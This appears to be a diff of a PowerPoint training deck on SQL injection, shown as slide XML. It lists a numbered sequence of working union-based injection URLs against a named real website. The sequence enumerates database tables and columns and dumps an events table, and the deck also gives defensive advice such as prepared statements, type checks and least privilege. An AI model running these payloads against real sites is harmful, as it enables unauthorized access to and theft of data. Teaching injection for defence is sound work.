+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>http://www.raahauges.com/view-news.php?id=8</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>2. http://www.raahauges.com/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>view-news.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=‘</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>3. http://www.raahauges.com/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>view-news.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=‘</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>4. http://www.raahauges.com/view-news.php?id=8</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>order</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>by</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>5</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> --</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>5. http://www.raahauges.com/view-news.php?id=null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> union all select 1,2,3,4,5 -- </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>6. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>table_name</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>),4,5 from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>information_schema.tables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> where </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>table_schema</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=database() --</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>7. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>column_name</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>),4,5 from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>information_schema.columns</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> where </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>table_schema</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=database() –</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>8. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(date,0x3a,time,0x3a,title,0x3a,details),4,5 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>from events --</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
             <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
@@ -18933,7 +19422,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="1018034"/>
+            <a:off x="125944" y="1084023"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -19311,48 +19800,13 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>inurl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>php?id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Let’s go!!!</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>

--- a/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
+++ b/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
@@ -5006,21 +5006,8 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>8. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(date,0x3a,time,0x3a,title,0x3a,details),4,5 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>from events --</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              <a:t>8. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(date,0x3a,time,0x3a,title,0x3a,details),4,5 from events --</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
@@ -16124,7 +16111,7 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>Old way: send mixing of code and data</a:t>
+              <a:t>Old way: send mixing of query and data</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -16267,7 +16254,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, April 29, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -16780,6 +16767,158 @@
               </a:rPr>
               <a:t>variables</a:t>
             </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Validation first: check </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>input has </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>expected </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>type</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>is_numeric</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Change input type: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>settype</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>()</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr marL="342900" indent="-342900" algn="l">

--- a/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
+++ b/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
@@ -3639,133 +3639,270 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Never connect to database as super user =&gt; limited privileges</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Use prepared statements with bound variables</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Check input has expected data type: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>is_numeric</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>()</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Change input type: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>settype</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>()</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>1. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Comprehensive data sanitization</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
